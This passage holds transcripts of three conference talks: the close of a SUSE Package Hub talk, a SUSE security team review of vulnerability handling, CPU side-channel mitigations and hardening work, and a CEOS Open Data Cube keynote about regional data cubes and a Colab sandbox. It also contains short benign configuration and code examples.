as possible with openSUSE Leap 15. So we are basically taking every package from Leap that doesn't conflict with the SLES packages into Package Hub 15. That's why the number of packages in Package Hub 15 is that high, and as you can see, it gets almost as close as Leap 15. This brings another nice side effect, because with Leap 15 you are able to migrate from Leap to SLES. That means that with the bare minimum server installation of Leap, you are able to migrate it to a SLES system. With Package Hub enabled, you could even install more packages — like the KDE Plasma 5 environment, tools like tmux or whatever you like — and then you can migrate, and you have these tools, these packages, also available on the SLES system. On a package level, these packages are also binary identical, because basically these are the same packages; they just got rebuilt for SLES in Package Hub.
And that's the second thing we changed. Basically, every new package now also goes through Leap first. That means it gets reviewed by the openSUSE Leap people, and then we can just pull it into Package Hub. And the updates that go into Leap, we are also pulling into Package Hub 15. What we also did — this is something more internal — is that for quick testing we are using Cancun; I don't know if some of you already know Cancun. It's basically a continuous integration testing system. We — let me put it that way — want to use openQA as well, but openQA is a little bit bigger in terms of the framework, and Cancun is a lightweight framework where you can just pull up a virtual machine, do some package testing, destroy it and get your results. By the way, if you have any questions, just wave your hand anytime so I can answer them. So, how to contribute? There are several ways you can contribute to Package Hub, because you don't need to be a package maintainer or a developer; basically, you can contribute on several levels. For example, if you are a developer and you just want to deploy or share your code, you can, as I already mentioned, create a package, get it into Leap, and then it can also be pushed to Package Hub and delivered to any installation — as a developer, you can see it as a deployment channel, basically. So Package Hub helps you to distribute your software, but it has to be free, open source software. If you are a package maintainer, it's much easier, because then you're probably already familiar with OBS, and if your package is already in Leap, you can just submit it to Package Hub as well and then you're good to go. If you're a customer using SLES, you have several options: either you are also a developer or package maintainer, then you're good to go; but if you don't have the knowledge to add packages to Package Hub, you can also ask either the community, or you can ask us as well, to assist you in finding package maintainers or people who are willing to do the packaging to get the software you want to use into Package Hub. So, any questions? No questions. So feel free to visit us at — yeah. I can just repeat: the question was, if a package from Package Hub basically damages the system, does the customer then still get support? The answer is yes and no. The thing is, usually the support is able to identify the package and the cause. So if it's a package from Package Hub, then I'm sure we can at least help the support and the customer to get rid of the problem or to fix the package. You have to look into the specific problem then. So just for the stream, or for the record: Scott already mentioned that if there are problems with a package, we have to look into it and make sure that we either drop the package or fix it. Okay. No more questions? Oh, there's one more. Ah, good question. The question is how and where you can request packages. That's very deeply hidden, because we don't want to — no, seriously. The thing is, we are also thinking of having something on the website, on packagehub.suse.com, where you can vote or just add missing packages you need. Currently that's not in place, so you can drop us an email at packagehub@suse.com and just ask us. If it's low-hanging fruit, let's call it that way.
So, an easy package that builds on SLES and doesn't have any big security concerns — that we can just add. But if it's a package that has a huge dependency list and some security concerns, then we really have to talk about it and think about it, because usually the package maintainer should also be involved in that process. Okay. No more questions. Thank you very much and enjoy the rest of the day.
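For package maintainers, the contribution path described in this talk essentially comes down to getting the package into openSUSE Leap/Factory and then submitting it to the Backports project behind Package Hub. A hedged osc sketch follows; the package name is just an example, and the target project name depends on the SLE service pack and should be checked first — it is an assumption here.

    # Branch the package you maintain (example package name)
    osc branch openSUSE:Factory tmux
    # ... verify that it builds in your branch against the Backports repositories ...

    # Submit it to the Backports project that feeds Package Hub
    # (target project name is an assumption; confirm the current target first)
    osc submitrequest home:yourname:branches:openSUSE:Factory tmux openSUSE:Backports:SLE-15-SP1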
SUSE Package Hub provides open source packages from the community to SUSE Linux Enterprise users. This talk shows the current state, explains how to contribute and also gives some insights into the life of Package Hub.
10.5446/54428 (DOI)
Yeah. Welcome to the security review of the last year. My name is Marcus. I will give you a bit of a retrospective of the last year, point out some highlights, but also tell you about the work that we are doing, in a pretty high-level way, so it will not have many technical details. So first, who are we? We are the SUSE security team. We are currently — let me count — eight people. Our boss has changed recently; his name is Ivan Teplin, and he's been with us for one month now. We have one project manager, that's me, and we have several security engineers. In alphabetical order we have Alexander, Alexandros, Johannes, Malte, Matthias and Robert, and Alexandros and Robert are sitting close to the back over there. The rest is unfortunately not here. We are still not complete: we are still looking for a good security engineer. We have one very good candidate that we are trying to get and one open position that we are also planning to fill. So what are we doing? The work that we are doing is split into two major parts that I will go over separately: the proactive part and the reactive part. The reactive part is handling security issues, handling security incidents, reacting to security incidents. We do that for all the SUSE products, for all the openSUSE products and distributions, but not for the kind of security issues that concern physical security or website security for SUSE — we only work on the SUSE Linux and openSUSE products. The team is split into two parts. The reactive part has me as the project manager overseeing it, and we have Alexander, Alexandros, Robert, and potentially a new guy working in this team and sharing the load between them. The proactive side is where we do software audits — what you can imagine as pen-testing-style audits — and where we approve the product releases. So basically the release managers come to us and ask: is my product secure? We do a final check of the product and give our green light, go ahead. And we do a lot of work before the shipment, during the development phase. That part of the team currently consists of Johannes, Malte and Matthias, and another potential new hire that we hopefully will be getting this year. So in case you're wondering what our names are, these are the names that a SUSE developer or SUSE contributor will likely encounter during your work with the security team. So let me first talk about reactive security, which is likely the more visible part of our work. We react to any reported security issues in our distributions, as mentioned, both on SLE and on openSUSE. To handle this load — I will give you some numbers in a minute — we have clearly specified roles so that everyone knows what to do, everyone knows exactly what he's been assigned to do, so that there is no confusion. We have split this into so-called incident managers and update managers, where we currently have two or three incident managers and one update manager, so the load is distributed evenly across the team. The roles rotate monthly so that it doesn't get too boring and too one-sided for anyone. Our task on the reactive side is to coordinate fixing the security issues from the beginning — from getting knowledge of them — until the end, meaning the release of all the updates and doing all the bug closing. We are not doing the fixes ourselves; we delegate that to the package maintainers, either the SUSE ones or the community maintainers, depending on who is assigned to the package in the build service.
We also don't look at the source patches that get submitted for the fixes — that is done by the OBS or IBS source review teams. The testing is delegated to the QA teams, and these days a huge part of it is done by automated testing, just as Oliver told us before, mostly by openQA; openSUSE is only tested by openQA at this time. There is the potential on openSUSE to have a testing repository added and used, but we rely very strongly on openQA testing for openSUSE maintenance. The next part where we are involved is the release of the update and everything afterwards, the documentation. Most of the documentation is automatically generated, just because there is so much of it; only for specific incidents do we do manual documentation work. So how does it look? How do we handle the incidents? Where do we interface with the packagers? We use the openSUSE Bugzilla. We have a specific summary-line tagging to make queries in Bugzilla easier: we start with a VUL-0 or VUL-1 prefix, then the CVE number, then the package name and a short summary of the issue. That makes Bugzilla searches very easy for us, for you and for everyone who wants to find such a thing. We fill in the Bugzilla report with the description, with links to patches, with the reproducers — so that our QA or the packager can verify the fix — and whatever other information is needed. And we assign it afterwards to the package maintainer for fixing. If the package maintainer has questions, he can always come back to us, set needinfo, ask a question in the bug report and ask us if he needs help with fixing. Internally, we also use a tool called SMASH that tracks the affectedness and the ratings of code streams for the SUSE Linux Enterprise products. For the rating we have a simplified scheme: low, moderate, important, critical — four steps that are easy to understand and to look at. But we also use an industry-standard rating called the Common Vulnerability Scoring System, version 3, which has a lot of indicators that in turn produce a number between zero and ten. That is also used in various industry standards to rate how fast security updates need to be applied or fixed. We evaluate and mark what is affected on which SLE code stream. That to some degree also reflects the openSUSE code streams, and we are also planning, at some point in the future, to directly track openSUSE with this tool as well. And there's one thing for the minor security issues: we occasionally decide it can wait — it doesn't need to be fixed right away because it's unlikely to be exploitable or it's really a minor issue. If it is a bigger issue, then we request an update via our workflow management tool. So, the first statistics, as promised. I have a query running since 2006, and you notice some trends. That's the open bugs per week; it starts in 2006, and on the right is the last week of 2019. We started at around 11 bugs per week, and it really continued like that until 2014, and then it got very noisy. Knowing it from the security point of view, that happened because a lot more automated bug finding was happening. With fuzzing, with more attention on specific tools, with automated bug finding, people were suddenly finding many more bugs in the software. One big example is ImageMagick, for instance, where over the last years around 500 security issues or so have been found. What is interesting, however, is that it now starts to decrease a bit.
So we had a peak of around 30, 40 bugs opened per week, but the last year, the last one and a half years, have seen a slight decline. That might mean that some of the means of automatic bug finding are exhausted, or it might mean that people are focusing more on different topics, or that someone is not opening or classifying enough CVEs anymore. So while I was thinking that the trend would only go upwards, I was kind of disproven here. Let's see what the next years will bring. A short look at our incident tracking system that we use internally: we are getting around 100 issues per day in this ticket system, but we open bugs only for around 5 to 10, depending on what is being found. So it helps to have a good UI where we can track it — you can think of it mostly as a ticketing system that additionally has the rating and affectedness marking on top. Here's a bit longer list where we already have specified ratings and affected packages. So how does the update management on our side work? After getting knowledge of the issue and fixing the package, the packager submits it. The security team — the update manager in this case — accepts the update and writes the metadata that is shown to users and that gets displayed later on in the automatically generated documentation: the summary, a human-readable description, and a list of issues in a machine-readable format. We check, of course, that it's building. These days we have some bots that catch it beforehand if it's not building, but under certain circumstances it might not build and might need some help. And we then forward it to QA. QA in that case is both automated and manual QA. The automation does all the regression testing these days — regression testing is no longer done manually — but our QA teams do manual bug fix verification: they verify that the bug is present before and that it is fixed afterwards. Once QA is finished, only then do we press the release button. The documentation, the emails that you see, the patches — that is all automatically generated; only for bigger issues do we do some manual work. A look at our tooling — we also have tooling for the update management in the enterprise. As you see, in this case we have 138 updates in QA or waiting for a QA engineer. With the amount of packages that we release — we release like 50, 60 updates per week on the SLE side and around 20 to 30 on the openSUSE side — without tooling it's really not manageable anymore. This is tooling that we developed ourselves within the maintenance team, with dedicated engineers looking at it, and it makes our work more efficient and easier. Yes, so what we deliver in the end: as mentioned, of course, the updates themselves get to your system. We send out notifications per email; they are uploaded to a website for the SLE updates. We also send, of course, emails to the openSUSE announcement lists. And we generate advisory data in a standard XML format called CVRF, the Common Vulnerability Reporting Framework — I hope I got it right, because that's all acronyms. That basically encodes the advisory in a very big XML blob and can then be used for importing into ticket systems, et cetera. We also generate other information: on a per-CVE basis, for every CVE we find, evaluate and fix, we have one page on our website where you can see the description, ratings, affectedness and what we have released.
Similar data is also generated by us in a machine-readable format called OVAL, the Open Vulnerability and Assessment Language — yet again a very big XML format that you can run through an interpreter to see whether a system is still affected by a CVE or not and what needs to be updated. So, some statistics for this year compared to last year — these are not for this year but for 2018, just to have a complete year. The number of CVEs that we looked at is 3,000, so 300 less than last year; that kind of coincides with the open bug trend a bit. We opened around 2,280 bugs, that's 300 less than in 2017. And if you look at the classification — I just put in the big numbers — approximately the same number of kernel bugs, but way fewer ImageMagick and GraphicsMagick bugs: really 170 fewer bugs, or CVEs, for ImageMagick and GraphicsMagick, just because there the bug finding using fuzzers has basically exhausted the bugs. It has not completely exhausted them — as you see, it's still 90 bugs, which is quite an amount — but it's not as massive as in 2017. Similarly for Firefox: 50 bugs less than in 2017. So people are still finding and fixing bugs in those code bases, but it gets better over time. The number of updates that we released: at first it looks much higher, but the reason for that is that we had more service packs and more products in 2018 than in 2017. I have not normalized it to the number of service packs; that would have been a bit too complicated with the general support and LTSS support. For openSUSE it is a bit more comparable, even though we have 42.3 and 15.0. We released some more updates for openSUSE than in 2017, and I also looked at how much we import from SLE — we import around 50% from SLE at this time. Total number of CVEs fixed: we fixed 100 CVEs less, also explained mostly by the ImageMagick decrease, and these are the numbers for openSUSE and SLE. They don't add up because they share CVE space. So one thing that the reactive team does — I mentioned it before — is that for some issues we do specific or more extensive documentation, and these are the so-called high impact vulnerabilities, the things that you read about in the press, or even see on a talk show or on CNN. It all started with Heartbleed and Shellshock and went even into this year with System Down and, just lately, the MDS CPU issue. These issues are special. Usually you have to think of our reactive incident work as a pipeline: we are opening bugs, updates get processed, packages get submitted, get released, and it just takes a while. But for these high impact vulnerabilities that have a severe technical impact, or where people really want a fix right now, we need a quicker reaction. We also need more communication about under what circumstances we are affected, what the real impact is — is it really that big of a problem? And also documentation: for CPU issues we need to document what options there are that customers can use to configure their systems, and especially, if there are tricky fixes, whether you need to do something manually on your system to mitigate it. So we handle these a bit differently, with much higher attention, with direct attention, and we even have a specific team dedicated to it, the emergency update team, that goes and does these fixes themselves and coordinates them, including even weekend work or late-night work.
One or two guys from the emergency update team are also here: Simon from the openSUSE board is one of these members, and Peter — I have not seen him yet — is also a member. So last year I talked a bit about Stack Clash and what we were planning to do and what we were doing. That was something from 2017: the general problem where the stack growing down and the mmap areas growing up could collide, and this could be exploited. What we had done already was mitigating that in the kernel with bigger stack gaps that could not be jumped over. We had already prepared GCC updates that were generating binary code that no longer has this problem. And — something that only came into effect last year — we released products, openSUSE Leap 15.0 and SLE 15, that already had this mitigation enabled. We also started releasing, last year, updates for Enterprise 12 and also Leap 42.3, so that the packages we released were no longer affected by the Stack Clash issue. Our efforts paid off, and that's something I want to show off, because in January there was a System Down exploit of systemd, where a regular user space program could gain root execution by just sending a specific log message to journald. But as we had already built systemd with the Stack Clash protection, all the updates on both SUSE Linux Enterprise and openSUSE were already fixed. So doing this proactively, building the packages proactively with this option, really paid off, as we were not affected by this problem at the beginning of this year. So now to the big topic, which I will go into in a bit more detail: the CPU issues. Last year I also talked a bit about Meltdown and Spectre already, but they got some new friends this year and last year. The general overview: these are side-channel information leak attacks that use speculative or out-of-order execution. The Spectre class is speculative execution of branches that might not be taken or are not taken, which leaks information that happens to be accessed in those non-taken branches. And the other part is the Meltdown class of CPU side-channel issues, basically a lack of access control during this kind of out-of-order execution. Meltdown itself happened because during out-of-order execution the protection bit for ring-zero-protected pages was not checked, so everything from the kernel could be read from user space. And there are various flavors of that, like the page-not-present bit, and also some higher-level flavors like MDS that we had. So various other flavors of both have been found — fortunately none of them as severe as Meltdown itself, but various flavors of both have been found. The problem with those is that, as they are CPU issues, we had long embargo times. For the last issue we had over nine months of embargo time. Just to prepare the patches, to get the whole industry, every other operating system and hypervisor vendor, under the same umbrella with the timing, to get the microcode updates ready — Intel really takes like three months to half a year to get microcode fixes ready for their CPUs. So we had quite long embargo times, and of course we need to put the fixes into our kernels, test them, and be ready on the date of shipment, because these issues still attract quite a lot of attention. One issue is of course that almost all of those fixes come with some performance losses, which, especially in the cloud provider space, is not a good thing — if suddenly your cloud runs 10% slower or something.
As I said, it has become mostly a whole new family: more Meltdown and Spectre variants like the bounds check bypass store, Lazy FPU — where it was possible to leak CPU FPU registers — L1 Terminal Fault and NetSpectre happened in 2018, and even in 2019 we got SPOILER, SMoTherSpectre, PortSmash and, just on the 14th of May, Microarchitectural Data Sampling, also called the Fallout, RIDL or ZombieLoad attack. So the good news is that for a number of them we have mitigations, or the potential to mitigate them completely — usually the Meltdown family, which is done with microcode and kernel mitigations acting together — and we know how to fix the other ones, which are mostly bug classes. The other good news is that Intel, whose CPUs are largely the affected ones, has started shipping new CPUs, Cascade Lake and newer, that are no longer affected by the Meltdown problem. So it's good for Intel that they are selling more CPUs; it's also good for us that we get our performance and security back. The not-so-good news, or the bad news, is that lately some issues have been found that are exploitable when using hyper-threading. Hyper-threading is where a CPU core runs multiple threads of execution and they share various resources like load buffers, store buffers, computational units and so on. The last attacks, L1TF and Microarchitectural Data Sampling, were largely exploiting these small buffers shared between hyper-threads. So the mitigations that we have are effective if stuff executes in a serial way — like from user space to root to kernel space and back, that is okay — but for threads on the same core, for a hyper-thread on the same core, it is hard to solve, because we cannot really influence what runs on the other thread. Not in the current setting. The obvious solution is of course to schedule only processes with the same privileges on the same core. That's called gang scheduling or co-scheduling. Unfortunately, there is no really working code for that, because doing it in the right way, so that it cannot be exploited, is very tricky and likely has a similar performance impact to just switching off hyper-threading altogether. There are some draft patches for the Linux kernel and I think also for Xen, but these are not yet production ready. We hope that they get to a point where they are production ready and performant, and then we will go and deploy them, but so far they are sadly not ready yet. So if you are really concerned that on your machine an attacker running on the same core could try to steal your secrets, the only option that currently exists is to disable hyper-threading on your system. So we had like eight different issues and seven different mitigations, and there appeared a website called make-linux-fast-again that lists all the kernel command line options that are needed to get the full performance back. And you see, if I now hide it and you try to remember it — even I couldn't remember it. So it needs a simpler front end. And the Linux kernel developers agreed that yes, it definitely needs a simpler configuration option, and they implemented, with the 5.1 or 5.2 kernel — I think the 5.1 kernel — a kernel command line option called mitigations that controls all of the CPU mitigations at once. It has three easy settings: the setting off, which just disables everything and gets back all the performance, and the setting auto, which will select, based on your CPU type, what is needed or not needed as a mitigation.
So if you have a new CPU, it will not switch on the Meltdown protection. And it also has the option of disabling hyper-threading, if you so desire. At SUSE we have discussed it on various levels and decided to go with the default of auto — leaving hyper-threading enabled, leaving that kind of performance still available, but at least enabling all the standard mitigations that are available. And to make it easier for our users, we have integrated this into the YaST installer. So in the installation overview you'll have, in the security section, a CPU mitigations option that you can click on, and you can easily change from auto to either off, auto or no-SMT, depending on your security needs. So there's one last bad thing, and that is that some of the issues are bug classes that are not getting fixed in the processor. Spectre variant one — basically branch prediction, or speculation over branches that are not taken — will not be getting fixed in the processor; we are supposed to fix that in the program code, in the kernel or in user land. It's mostly a bug class. So if you want to fix it, there's not a single line of code that needs to be fixed; it's in a lot of places, and there's no generic way to do it. There has been some research into compiler-based mitigation of Spectre variant one, but unfortunately the performance loss of doing it in the compiler is quite high — really like a 50% performance loss if you do it via the compiler. So it's under control in the kernel: the kernel has deployed things like index masking and the respective fences that are needed to control that. Our user land code has also already been supplied with it, like some JavaScript just-in-time compilers and so on. But this might be an issue that we still need to take care of in the future. There are two others that were only recently published, SMoTherSpectre and PortSmash. These are not leaking information directly, but they can find out what the other CPU thread is doing — whether it's doing a lot of vector stuff, a lot of multiplications or additions. By monitoring that you can find out, for instance, if there's a cryptographic algorithm running on the other CPU thread that is not specifically prepared for that, what kind of keys the other cryptographic algorithm is processing, and find out the content of the keys. So the only way to fix that currently is to really write cryptographic code, and any other code that could be snooped on, where information could be gained from snooping, in a constant-time manner — having constant-time compares, constant-time multiplications, additions and so on. Fortunately, a lot of cryptographic code is already prepared for that, because this kind of computational side-channel issue is not a new thing, but it becomes more urgent with this knowledge about the exploitation of these issues via hyper-threading. So, enough of the reactive security part — what is our proactive team doing? Their general mission statement is making products secure before shipment and implementing a secure development lifecycle within SUSE. We are doing this at various stages, in an automated fashion and in a manual fashion. The first thing that comes to mind is automated checks during the build: similar to what we do with make check, we also do that for the security aspects.
Like, if you add a new setuid binary, your build will fail if it's not whitelisted by us. If you add a new D-Bus service or PolicyKit rule and it's not whitelisted by us, your build will fail and we will tell you to contact the security team for whitelisting. At that point, you open a bug, we look at the code, we tell you where the bugs are, you fix the bugs, and then we whitelist it. That includes all other things — system network services or whatever security interface you have in your package or in your product. We are not doing this just before the release, but during the whole process. So basically, similar to the openSUSE Factory model, all these audits are rolling. Especially as we also work with Factory, the Factory developers come to us and say they have a new D-Bus service, can we please review that? We review it, it gets approved, and at some point in time it gets shipped via openSUSE Leap or in the enterprise products. These are largely package-based audits, but we are also doing product audits. Currently we do the final product sign-off audit about a month before a product gets shipped. openSUSE Leap 15.1 was reviewed a month ago — Johannes took a look at it for a week and fortunately found no big issues there. So even though we are the SUSE security team, we work in Factory; a lot of the stuff we do is done in openSUSE, even in openSUSE first, and later on in SUSE Linux Enterprise. Our focus is of course getting SUSE Linux Enterprise secure, but openSUSE is our main driver of work there. Just to look at the workload: we had around the same number of audit requests in 2018 as in 2017, but we were able to process more because our team has grown. I have not got those numbers here, unfortunately. What else does the proactive team do? We add new hardening methods. Last year I talked a bit about PIE support. What we are currently working on: we have had the hardening LDFLAGS for a long time already, but now we also want to deploy the -z now hardening for ELF binaries. And we want to move some compiler warning checks that we are currently doing in post-build checks directly to -Werror options, which is done by the compiler team, so that your build will not just emit warnings but will directly fail if something is wrong. Our colleague Karol, who is no longer in the security team but now in a different role, is a very big YubiKey fan, and he just had a YubiKey workshop and a YubiKey talk yesterday. That is something that we added or improved in openSUSE in the last year and also shipped in SLES 12 SP4 and SLES 15 for two-factor authentication. Last year also saw some Ghostscript security issues. I didn't mention them earlier, but what we did is improve the hardening around Ghostscript. For ImageMagick and GraphicsMagick, which can convert PostScript to images, we now ship two configuration files: one configuration file has these coders disabled and one has them enabled, depending on your use case. And the default is that we disabled them, because Ghostscript is still a very risky tool and might have more security issues than we have already fixed. We also disabled PostScript display in places where it's not really needed, or made it optional, or, for tools that you wouldn't even have known do that, disabled it.
We also tried confinement using AppArmor, a general confinement tool. That has unfortunately not been very successful yet, because Ghostscript is used in a lot of pipe modes and a lot of settings that AppArmor cannot fully control. We had quite some success, but we also had some rather angry users who were no longer able to run their preferred tool. We also do audits for non-distribution products like Cloud and Storage. We reviewed the bigger new tools that get added — a lot of what happens at SUSE is adding stuff on top of the distributions. We are also planning, or occasionally planning, on embedding engineers into product teams. While we haven't done this in the last year, that is an option we always consider, especially for bigger agile teams, that we occasionally help out and send someone to a team for some weeks. Then we have challenging new products like the container management product CaaSP, and also the Cloud Application Platform that is using Cloud Foundry on top of CaaSP, on top of OpenStack — very complicated products, quite hard to understand, quite hard to get an overview of, and in turn quite hard to make into secure products. But this is something that we will also be looking into even more closely in the next years. One side project that we are doing is certifications. One of these is directly security related: the DISA STIG. STIG stands for Security Technical Implementation Guide and is just another formalized word for a hardening guide. It's really a formalized thing, largely coordinated by the US government and especially the US military. They describe, in a step-by-step formal approach, how to secure a system. There are various forms in which it can be handed out: a textual description form where you have 200, 300 rules that the administrator goes through — checks, makes the changes, gets the next rule, checks, makes the changes, and so on — or it can be done in an automated format, in a so-called benchmark or SCAP format; SCAP is the Security Content Automation Protocol. We are currently working on providing this to our enterprise customers, but the same can, with only some small adjustments, likely also be deployed on openSUSE. So it's basically what we had earlier as hardening guides, in a very formal textual form and later on in an XML form. We also do cryptographic certifications. Just recently NIST, another US government body, released the FIPS 140-3 standard, basically describing the crypto parameters that your cryptographic system has to fulfill. And we also plan to work on a Common Criteria certification, which we did for the last enterprise servers; we also plan to do that for the Enterprise Server 15. The Common Criteria certification covers the whole development process and the product that comes out of it. So how are we publicly visible, apart of course from the service we provide to openSUSE? What we do benefits all the upstream open source projects — they get more secure, so even other vendors benefit from our work. We recently started participating in the Nürnberg IT security meetup called 0911.org, and we are hosting every second instance at our offices. And we present occasionally at conferences like this one or other security conferences. We are planning on extending our presence as we are growing; currently it's not that much, but we are trying to improve on that. So that's it from my side.
You can find our landing page and our main contact address — where you can send security questions — here, and note that we are looking for some good engineers. Any questions? I will be hanging around here if you have questions later on. And thank you for listening.
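As a concrete illustration of the mitigations= kernel command line option discussed in the CPU part of this talk, here is a hedged sketch of how it would typically be set via the bootloader configuration on a (open)SUSE system. The option values follow the upstream kernel documentation for kernels 5.1/5.2 and later; check the documentation of your exact kernel version before relying on them.

    # /etc/default/grub (sketch)
    GRUB_CMDLINE_LINUX_DEFAULT="... mitigations=auto"          # SUSE default: standard mitigations on
    # GRUB_CMDLINE_LINUX_DEFAULT="... mitigations=off"         # full performance, no mitigations
    # GRUB_CMDLINE_LINUX_DEFAULT="... mitigations=auto,nosmt"  # additionally disable hyper-threading

    # Regenerate the bootloader configuration afterwards
    grub2-mkconfig -o /boot/grub2/grub.cfg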
Another year - another security retrospective. The talk will introduce the SUSE security team and its members, our areas of work and responsibilities. The talk will show some statistics and interesting details of last year's security issues, and go into detail on some of the specific codenamed ones. A special focus will be an updated classification and overview of last year's Meltdown- and Spectre-like CPU issues, describing them and the mitigations that SUSE has deployed. As the SUSE security team has grown in the last year, we also increased our work in both proactive security and related areas, which the talk will briefly highlight.
10.5446/54371 (DOI)
Welcome to the keynote session EO at the Edge. I'm Brian Killough from NASA and I lead the CEOS Systems Engineering Office. I'll be facilitating this session, so let's jump in. Our session theme, EO at the Edge, will explore how Earth observation data is being used in new and innovative ways and what we see for the future. I'll kick off this session with a short presentation, followed by five other presentations from our guest speakers, and then we will end with a 45-minute panel discussion. I thought I would share some news and innovations from the CEOS world — a few things that we have accomplished recently that many of you may not know are happening. There are a number of regional cubes that are in discussion and development. Many of you know of Digital Earth Africa, but we're also working in the Americas, Digital Earth Americas, and in the Pacific Islands, Digital Earth Pacific. You see our icons over there to the right, and all of these things are coming along quite nicely towards our aim of someday having regional data cubes around the world. There's also been a lot of progress in analysis ready data. There's a CEOS Analysis Ready Data for Land specification called CARD4L that you may have heard about. And we have a number of new specifications in development, such as aquatic reflectance, nighttime light radiance, and interferometric and polarimetric radar as well as LiDAR. It's our hope that many of these specifications will come together and be approved within the year, and we will have quite an extensive list of CARD4L specs. There are also a number of new cloud providers that are hosting CEOS datasets — most recently Microsoft's Azure cloud and the Planetary Computer. They're coming on board with many of the same large datasets that we're used to using, and you're probably going to hear more from them in the near future. I always get a number of unexpected inquiries about the Open Data Cube, and I just wanted to let all of you know what some of these inquiries are and where they're coming from, because I always find them quite interesting. I've had a number from student researchers that just asked to use the Open Data Cube for their research or their projects. I was contacted by the Norwegian Computing Center. There's also an Ernst & Young (EY) student challenge happening in Australia, and I've been partnering with Geoscience Australia to help them move that forward. We've been contacted by the German Aerospace Center. Just a few weeks ago I was contacted by a group called the AIR Centre in the Azores, and they are producing an Azores data cube. Geo IM map is working in the Middle East. The UN World Food Program has contacted us directly about Digital Earth Pacific, and then most recently, just this past week, I was involved in a conference called Earth Archive, which is an attempt to create a three-dimensional digital elevation model of the Earth — what they call a digital twin — and store that data in voxel maps, which are basically three-dimensional pixels. And then finally I wanted to mention that we've developed a new Open Data Cube sandbox that utilizes Google Colab and Google Earth Engine, and I'll tell you a bit more about that on the next chart. We're really excited about the new Open Data Cube sandbox. You can find the link there, openearthalliance.org, to go check it out on your own. It runs on Google Colab, so it's a free and open notebook interface.
It connects to Google Earth Engine datasets, and we've indexed a number of the big datasets like Landsat, Sentinel-1 and Sentinel-2. And you can create sample application products and run them anywhere in the world without the need to download data. The key to this is that it's free, it's open, and you can run Jupyter notebooks immediately. Now there is one catch, and that is that you need a Google account. So if you just have a Google Gmail address, that's perfectly fine. And then you need Earth Engine authorization. If you go to the sandbox link, you will see information on how to apply for Earth Engine authorization. It's a rather simple step, and sometimes it just takes a matter of minutes or an hour, or sometimes a day or two, depending upon the email address you use. This Google Colab environment is small: it includes about 12 gigabytes of RAM and about 100 gigabytes of storage. So when you spin it up and initialize it, it gives you your own dedicated instance, and you can do a number of analyses there and demonstrate notebooks. It's really fantastic for the potential for training and capacity building. But if you want to run larger analyses and scale this up, you're going to have to move it to Google Cloud to take advantage of the Earth Engine datasets. So what we've done is we've created a number of sample applications, or sample notebooks, that are ready for users to run. We have cloud statistics for Landsat 8 and Sentinel-2: it basically looks at a stack of scenes, and you can go through those scenes, get cloud statistics and look at the images. Spectral products: you can create cloud-filtered mosaics and even download and save the mosaic locally. Vegetation change, water extent using the WOfS algorithm from Australia, vegetation phenology, nighttime lights using the VIIRS instrument, mission coincidences — which is really interesting; that is, when do Landsat 8, Sentinel-1 or Sentinel-2 cross over simultaneously at any location. And finally we have a notebook dedicated to Sentinel-1 radar products. So all of these run on this platform that is managed by Google, and Colab is the environment that runs the Jupyter notebook. It's really fantastic. I urge you all to go check it out, and we'll be making some updates in the next week or two because we'll be demoing this for the upcoming GEO meeting. So finally I wanted to end with a few thoughts on what we see for the future. Certainly more regional and local data cubes around the world — they seem to be popping up all of the time. When I say local, I probably mean more country-level data cubes, and I told you a bit earlier about the regional initiatives. In general I'm seeing broad Open Data Cube adoption by governments and commercial entities around the world. I think it's fantastic that the efforts of this Open Data Cube community have benefited so many people in having more efficient and effective access to data. Along those lines, faster and more efficient applications: we're noticing that a lot of our notebooks are using Dask now, we're using parallel processing and machine learning, and I think all of these ideas for our applications are going to be more popular. Python proficiency is also increasing around the globe. I just personally completed a Python class this past week so that I could become a bit better with my skills. And we're managing a few training sessions within the CEOS world, through the Working Group on Capacity Building, to do a large-scale training event for Python.
So it's really exciting to see that more people are stepping up to learn how to use this, and it makes the ability to run our notebooks and use our satellite data so much easier. The standardization of metadata and the STAC format is something I believe is taking hold, and it's ultimately going to eliminate the need for ODC indexing if we can get everything into the STAC metadata format. I'm also seeing a number of diverse datasets that want the ability to utilize the Open Data Cube framework. There's some work going on with drones — Analytical Mechanics Associates, the group I work with here, has been piloting some drone data integrated with the Open Data Cube. I'm working with the voxel-map people on the Earth Archive project for 3D voxels, and then of course there's the Internet of Things, which would give us the ability to take data from small devices and store it in Open Data Cube frameworks. And then finally, interoperable analyses that use multiple and diverse datasets. There are not many of those happening yet, but I believe that is also the way of the future: bringing together all of these diverse datasets for the objective of a given output product, and that's where the power of the computing and some of these interesting concepts will come together. So thank you for that brief introduction. As always, please check out the Open Data Cube website. We have a Twitter account, and if you want to see more about the Google sandbox that I discussed, go to openearthalliance.org/sandbox. Thank you.
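For readers who have not used the Open Data Cube API before, the kind of notebook analysis the sandbox's sample applications are built from usually starts with a load call along these lines. This is a minimal sketch only: the product name, band names, extents, CRS and resolution below are assumptions that differ between deployments, so check dc.list_products() and dc.list_measurements() in the environment you are using.

    import datacube

    dc = datacube.Datacube(app="cloud_free_mosaic")

    # Load a small area of (hypothetical) Landsat 8 surface reflectance
    ds = dc.load(
        product="ls8_sr",                     # assumed product name
        x=(149.0, 149.2), y=(-35.4, -35.2),   # longitude / latitude extents
        time=("2021-01-01", "2021-03-31"),
        measurements=["red", "green", "blue"],
        output_crs="EPSG:6933",
        resolution=(-30, 30),
    )

    # A simple cloud-"filtered" composite: the per-pixel median over time
    mosaic = ds.median(dim="time")
    mosaic[["red", "green", "blue"]].to_array().transpose("y", "x", "variable").plot.imshow(robust=True)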
Dr. Brian Killough has 34 years of NASA experience and leads the Committee on Earth Observing Satellites (CEOS) Systems Engineering Office. The SEO supports the international CEOS organization coordinating satellite earth observation data for global benefit. Dr. Killough has played a significant role in the evolution of the Open Data Cube initiative and the development of several country-level and regional data cube initiatives. Dr. Killough received his BS degree from the University of Virginia, his MS degree from George Washington University and his PhD from the College of William and Mary.
10.5446/54372 (DOI)
